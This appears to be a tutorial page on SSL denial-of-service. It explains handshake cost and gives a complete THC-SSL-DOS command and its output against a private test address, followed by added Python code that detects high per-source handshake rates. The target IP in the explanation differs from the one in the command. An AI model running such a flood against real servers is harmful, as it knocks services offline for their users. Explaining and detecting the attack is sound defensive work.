DOS Attacks on SSL Service
Important information (such as e-mail addresses, credit card information, ID numbers, usernames and passwords) must be encrypted in transit. HTTP is a clear-text protocol; it can be configured as HTTPS, which is protected by SSL/TLS. Cryptographic algorithms provide a level of protection that depends on the strength of the algorithm.
The Secure Sockets Layer (SSL) protocol provides secure data communication over the internet. Nowadays, it is mostly used in online banking transactions, social networks and e-mail servers.
A normal SSL connection established without any manipulation requires an average of 15 times more processor power than a standard HTTP connection. As a result, the server needs more resources because it has more work to do. The THC-SSL-DOS tool, built on this observation, uses the traffic it creates between the client and the server to measure how well the server responds to SSL requests. If the server cannot respond, it goes out of service and the system appears down. The screenshot below shows the anatomy of the attack.
thc-ssl-dos is a powerful tool for this purpose. In general, the THC-SSL-DOS tool is used as follows.
-l 100: Specifies the number of connections to be opened.
192.168.10.12: Destination IP address
443: SSL port
root@hostb# thc-ssl-dos -l 100 192.168.100.12 443 --accept
Greetingz: the french underground
Waiting for script kiddies to piss off............
The force is with those who read the source...
Handshakes 0 [0.00 h/s], 1 Conn, 0 Err
Handshakes 2 [2.90 h/s], 6 Conn, 0 Err
Handshakes 25 [22.42 h/s], 13 Conn, 0 Err
Handshakes 70 [43.97 h/s], 20 Conn, 0 Err
Handshakes 125 [56.51 h/s], 27 Conn, 0 Err
Handshakes 185 [62.09 h/s], 33 Conn, 0 Err
Handshakes 262 [74.56 h/s], 41 Conn, 0 Err
Handshakes 365 [104.93 h/s], 47 Conn, 0 Err
Handshakes 496 [131.23 h/s], 54 Conn, 0 Err
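
In the output above, the handshake rate from a single client keeps climbing while the connection count stays small, which is the signal a defender can watch for. The Python code below is an added example, not part of the original page or of the tool: it flags source addresses whose handshake count in a sliding one-second window exceeds a threshold. The log format, the threshold of 20 and the addresses are assumptions constructed for illustration.

```python
from collections import defaultdict, deque

def peak_handshake_rates(lines, window_ms=1000):
    """Map each source IP to its peak handshake count in any window_ms span.

    Assumed (hypothetical) log format, time-ordered: "<epoch_ms> <src_ip> <event>".
    """
    recent = defaultdict(deque)  # per-source timestamps still inside the window
    peak = {}
    for line in lines:
        parts = line.split()
        if len(parts) != 3 or parts[2] != "handshake":
            continue  # ignore malformed lines and other event types
        try:
            ts = int(parts[0])
        except ValueError:
            continue  # non-numeric timestamp
        q = recent[parts[1]]
        q.append(ts)
        while ts - q[0] >= window_ms:  # drop handshakes older than the window
            q.popleft()
        peak[parts[1]] = max(peak.get(parts[1], 0), len(q))
    return peak

def flag_sources(lines, threshold=20, window_ms=1000):
    """Return sorted source IPs whose peak rate exceeds threshold per window."""
    peaks = peak_handshake_rates(lines, window_ms)
    return sorted(ip for ip, n in peaks.items() if n > threshold)

def build_sample():
    """Constructed sample log, not captured traffic."""
    lines = []
    for i in range(100):  # one source completing a handshake every 20 ms
        lines.append(f"{1700000000000 + i * 20} 192.0.2.50 handshake")
    for i in range(5):    # ordinary client: one handshake every 400 ms
        lines.append(f"{1700000000000 + i * 400} 192.0.2.10 handshake")
    lines.append("not-a-time 192.0.2.10 handshake")  # malformed timestamp
    lines.append("1700000000500 192.0.2.10 close")   # other event type
    return lines

if __name__ == "__main__":
    sample = build_sample()
    print(peak_handshake_rates(sample))
    print(flag_sources(sample))
```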